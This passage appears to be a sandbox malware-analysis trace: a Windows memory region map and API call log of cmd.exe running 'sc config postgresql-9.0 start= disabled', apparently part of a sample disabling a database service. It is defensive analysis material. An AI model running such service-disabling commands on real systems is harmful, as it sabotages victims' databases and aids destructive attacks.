0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6437 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6438 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 6439 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6440 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 6441 start_va = 0x4800000 end_va = 0x480ffff entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 6442 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6443 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6444 start_va = 0x4960000 end_va = 0x4a5ffff entry_point = 0x0 region_type = private name = "private_0x0000000004960000" filename = "" Region: id = 6445 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6486 start_va = 0x44a0000 end_va = 0x44affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044a0000" filename = "" Region: id = 6487 start_va = 0x4660000 end_va = 0x471dfff entry_point = 0x4660000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6488 start_va = 0x4720000 end_va = 0x475ffff entry_point = 0x0 region_type = private name = "private_0x0000000004720000" filename = "" Region: id = 6489 start_va = 0x47f0000 end_va = 0x47fffff entry_point = 0x0 region_type = private name = "private_0x00000000047f0000" filename = "" Region: id = 6490 start_va = 0x4810000 end_va = 0x490ffff entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 6491 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6492 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6493 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6494 start_va = 0x7ec80000 end_va = 0x7ed7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ec80000" filename = "" Region: id = 6495 start_va = 0x7eda9000 end_va = 0x7edabfff entry_point = 0x0 region_type = private name = "private_0x000000007eda9000" filename = "" Region: id = 6496 start_va = 0x44b0000 end_va = 0x44b3fff entry_point = 0x0 region_type = private name = "private_0x00000000044b0000" filename = "" Region: id = 6497 start_va = 0x44c0000 end_va = 0x44c3fff entry_point = 0x0 region_type = private name = "private_0x00000000044c0000" filename = "" Region: id = 6498 start_va = 0x4a60000 end_va = 0x4d96fff entry_point = 0x4a60000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 409 os_tid = 0xe8c [0128.731] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0128.731] __set_app_type (_Type=0x1) [0128.731] __p__fmode () returned 0x77ac4d6c [0128.731] __p__commode () returned 0x77ac5b1c [0128.732] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0128.732] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0128.732] GetCurrentThreadId () returned 0xe8c [0128.732] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe8c) returned 0x84 [0128.732] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0128.732] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0128.732] SetThreadUILanguage (LangId=0x0) returned 0x409 [0128.734] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0128.734] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x462fc78 | out: phkResult=0x462fc78*=0x0) returned 0x2 [0128.734] VirtualQuery (in: lpAddress=0x462fc7f, lpBuffer=0x462fc30, dwLength=0x1c | out: lpBuffer=0x462fc30*(BaseAddress=0x462f000, AllocationBase=0x4530000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0128.735] VirtualQuery (in: lpAddress=0x4530000, lpBuffer=0x462fc30, dwLength=0x1c | out: lpBuffer=0x462fc30*(BaseAddress=0x4530000, AllocationBase=0x4530000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0128.735] VirtualQuery (in: lpAddress=0x4531000, lpBuffer=0x462fc30, dwLength=0x1c | out: lpBuffer=0x462fc30*(BaseAddress=0x4531000, AllocationBase=0x4530000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0128.735] VirtualQuery (in: lpAddress=0x4533000, lpBuffer=0x462fc30, dwLength=0x1c | out: lpBuffer=0x462fc30*(BaseAddress=0x4533000, AllocationBase=0x4530000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0128.735] VirtualQuery (in: lpAddress=0x4630000, lpBuffer=0x462fc30, dwLength=0x1c | out: lpBuffer=0x462fc30*(BaseAddress=0x4630000, AllocationBase=0x4630000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0128.735] GetConsoleOutputCP () returned 0x1b5 [0128.735] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0128.735] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0128.735] _get_osfhandle (_FileHandle=1) returned 0x3c [0128.735] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0128.735] _get_osfhandle (_FileHandle=1) returned 0x3c [0128.735] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0128.735] _get_osfhandle (_FileHandle=1) returned 0x3c [0128.735] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0128.736] _get_osfhandle (_FileHandle=0) returned 0x38 [0128.736] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0128.736] _get_osfhandle (_FileHandle=0) returned 0x38 [0128.736] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0128.736] GetEnvironmentStringsW () returned 0x4967d98* [0128.736] FreeEnvironmentStringsA (penv="A") returned 1 [0128.736] GetEnvironmentStringsW () returned 0x4967d98* [0128.736] FreeEnvironmentStringsA (penv="A") returned 1 [0128.736] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x462ebdc | out: phkResult=0x462ebdc*=0x94) returned 0x0 [0128.736] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x462ebe0, lpData=0x462ebe8, lpcbData=0x462ebe4*=0x1000 | out: lpType=0x462ebe0*=0x0, lpData=0x462ebe8*=0x88, lpcbData=0x462ebe4*=0x1000) returned 0x2 [0128.736] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x462ebe0, lpData=0x462ebe8, lpcbData=0x462ebe4*=0x1000 | out: lpType=0x462ebe0*=0x4, lpData=0x462ebe8*=0x1, lpcbData=0x462ebe4*=0x4) returned 0x0 [0128.736] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x462ebe0, lpData=0x462ebe8, lpcbData=0x462ebe4*=0x1000 | out: lpType=0x462ebe0*=0x0, lpData=0x462ebe8*=0x1, lpcbData=0x462ebe4*=0x1000) returned 0x2 [0128.736] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x462ebe0, lpData=0x462ebe8, lpcbData=0x462ebe4*=0x1000 | out: lpType=0x462ebe0*=0x4, lpData=0x462ebe8*=0x0, lpcbData=0x462ebe4*=0x4) returned 0x0 [0128.736] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x462ebe0, lpData=0x462ebe8, lpcbData=0x462ebe4*=0x1000 | out: lpType=0x462ebe0*=0x4, lpData=0x462ebe8*=0x40, lpcbData=0x462ebe4*=0x4) returned 0x0 [0128.736] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x462ebe0, lpData=0x462ebe8, lpcbData=0x462ebe4*=0x1000 | out: lpType=0x462ebe0*=0x4, lpData=0x462ebe8*=0x40, lpcbData=0x462ebe4*=0x4) returned 0x0 [0128.736] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x462ebe0, lpData=0x462ebe8, lpcbData=0x462ebe4*=0x1000 | out: lpType=0x462ebe0*=0x0, lpData=0x462ebe8*=0x40, lpcbData=0x462ebe4*=0x1000) returned 0x2 [0128.736] RegCloseKey (hKey=0x94) returned 0x0 [0128.737] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x462ebdc | out: phkResult=0x462ebdc*=0x94) returned 0x0 [0128.737] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x462ebe0, lpData=0x462ebe8, lpcbData=0x462ebe4*=0x1000 | out: lpType=0x462ebe0*=0x0, lpData=0x462ebe8*=0x40, lpcbData=0x462ebe4*=0x1000) returned 0x2 [0128.737] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x462ebe0, lpData=0x462ebe8, lpcbData=0x462ebe4*=0x1000 | out: lpType=0x462ebe0*=0x4, lpData=0x462ebe8*=0x1, lpcbData=0x462ebe4*=0x4) returned 0x0 [0128.737] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x462ebe0, lpData=0x462ebe8, lpcbData=0x462ebe4*=0x1000 | out: lpType=0x462ebe0*=0x0, lpData=0x462ebe8*=0x1, lpcbData=0x462ebe4*=0x1000) returned 0x2 [0128.737] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x462ebe0, lpData=0x462ebe8, lpcbData=0x462ebe4*=0x1000 | out: lpType=0x462ebe0*=0x4, lpData=0x462ebe8*=0x0, lpcbData=0x462ebe4*=0x4) returned 0x0 [0128.737] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x462ebe0, lpData=0x462ebe8, lpcbData=0x462ebe4*=0x1000 | out: lpType=0x462ebe0*=0x4, lpData=0x462ebe8*=0x9, lpcbData=0x462ebe4*=0x4) returned 0x0 [0128.737] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x462ebe0, lpData=0x462ebe8, lpcbData=0x462ebe4*=0x1000 | out: lpType=0x462ebe0*=0x4, lpData=0x462ebe8*=0x9, lpcbData=0x462ebe4*=0x4) returned 0x0 [0128.737] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x462ebe0, lpData=0x462ebe8, lpcbData=0x462ebe4*=0x1000 | out: lpType=0x462ebe0*=0x0, lpData=0x462ebe8*=0x9, lpcbData=0x462ebe4*=0x1000) returned 0x2 [0128.737] RegCloseKey (hKey=0x94) returned 0x0 [0128.737] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29831 [0128.737] srand (_Seed=0x5ad29831) [0128.737] GetCommandLineW () returned="/c sc config postgresql-9.0 start= disabled" [0128.737] GetCommandLineW () returned="/c sc config postgresql-9.0 start= disabled" [0128.737] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0128.737] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4969cf0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0128.737] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0128.737] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0128.737] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0128.737] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0128.737] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0128.737] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0128.737] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0128.737] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0128.737] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0128.737] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0128.737] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0128.737] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0128.737] GetEnvironmentStringsW () returned 0x4967d98* [0128.738] FreeEnvironmentStringsA (penv="A") returned 1 [0128.738] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.738] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0128.738] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0128.738] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0128.738] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0128.738] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0128.738] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0128.738] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0128.738] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0128.738] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0128.738] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x462f9b4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0128.738] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x462f9b4, lpFilePart=0x462f9ac | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x462f9ac*="Desktop") returned 0x1d [0128.738] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0128.738] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x462f730 | out: lpFindFileData=0x462f730) returned 0x49605c8 [0128.738] FindClose (in: hFindFile=0x49605c8 | out: hFindFile=0x49605c8) returned 1 [0128.738] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x462f730 | out: lpFindFileData=0x462f730) returned 0x49605c8 [0128.738] FindClose (in: hFindFile=0x49605c8 | out: hFindFile=0x49605c8) returned 1 [0128.738] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0128.738] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x462f730 | out: lpFindFileData=0x462f730) returned 0x49605c8 [0128.738] FindClose (in: hFindFile=0x49605c8 | out: hFindFile=0x49605c8) returned 1 [0128.739] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0128.739] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0128.739] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0128.739] GetEnvironmentStringsW () returned 0x4967d98* [0128.739] FreeEnvironmentStringsA (penv="=") returned 1 [0128.739] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0128.739] GetConsoleOutputCP () returned 0x1b5 [0128.739] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0128.739] GetUserDefaultLCID () returned 0x409 [0128.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0128.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x462fae4, cchData=128 | out: lpLCData="0") returned 2 [0128.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x462fae4, cchData=128 | out: lpLCData="0") returned 2 [0128.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x462fae4, cchData=128 | out: lpLCData="1") returned 2 [0128.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0128.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0128.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0128.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0128.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0128.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0128.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0128.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0128.740] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0128.740] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0128.740] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0128.741] GetConsoleTitleW (in: lpConsoleTitle=0x496aa38, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.741] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0128.741] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0128.741] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0128.741] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0128.741] _wcsicmp (_String1="sc", _String2=")") returned 74 [0128.741] _wcsicmp (_String1="FOR", _String2="sc") returned -13 [0128.741] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13 [0128.741] _wcsicmp (_String1="IF", _String2="sc") returned -10 [0128.741] _wcsicmp (_String1="IF/?", _String2="sc") returned -10 [0128.741] _wcsicmp (_String1="REM", _String2="sc") returned -1 [0128.741] _wcsicmp (_String1="REM/?", _String2="sc") returned -1 [0128.742] GetConsoleTitleW (in: lpConsoleTitle=0x462f7d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.743] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0128.743] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0128.743] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0128.743] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0128.743] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0128.743] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0128.743] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0128.743] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0128.743] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0128.743] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0128.743] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0128.743] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0128.743] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0128.743] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0128.743] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0128.743] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0128.743] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0128.743] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0128.743] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0128.743] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0128.743] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0128.743] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0128.743] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0128.743] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0128.743] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0128.743] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0128.743] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0128.743] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0128.743] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0128.743] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0128.743] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0128.743] _wcsicmp (_String1="sc", _String2="START") returned -17 [0128.743] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0128.743] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0128.743] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0128.743] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0128.743] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0128.743] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0128.743] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0128.743] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0128.743] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0128.743] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0128.743] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0128.743] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0128.743] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0128.743] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0128.743] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0128.743] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0128.743] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0128.743] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0128.743] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0128.743] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0128.743] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0128.743] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0128.744] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0128.744] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0128.744] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0128.744] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0128.744] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0128.744] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0128.744] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0128.744] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0128.744] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0128.744] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0128.744] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0128.744] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0128.744] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0128.744] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0128.744] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0128.744] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0128.744] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0128.744] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0128.744] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0128.744] _wcsicmp (_String1="sc", _String2="START") returned -17 [0128.744] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0128.744] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0128.744] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0128.744] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0128.744] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0128.744] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0128.744] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0128.744] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0128.744] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0128.744] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0128.744] _wcsicmp (_String1="sc", _String2="FOR") returned 13 [0128.744] _wcsicmp (_String1="sc", _String2="IF") returned 10 [0128.744] _wcsicmp (_String1="sc", _String2="REM") returned 1 [0128.744] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0128.744] SetErrorMode (uMode=0x0) returned 0x0 [0128.744] SetErrorMode (uMode=0x1) returned 0x0 [0128.744] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x49605d0, lpFilePart=0x462f2dc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x462f2dc*="Desktop") returned 0x1d [0128.745] SetErrorMode (uMode=0x0) returned 0x1 [0128.745] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0128.745] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0128.752] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0128.752] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0128.752] GetConsoleTitleW (in: lpConsoleTitle=0x462f55c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.752] InitializeProcThreadAttributeList (in: lpAttributeList=0x462f488, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x462f46c | out: lpAttributeList=0x462f488, lpSize=0x462f46c) returned 1 [0128.752] UpdateProcThreadAttribute 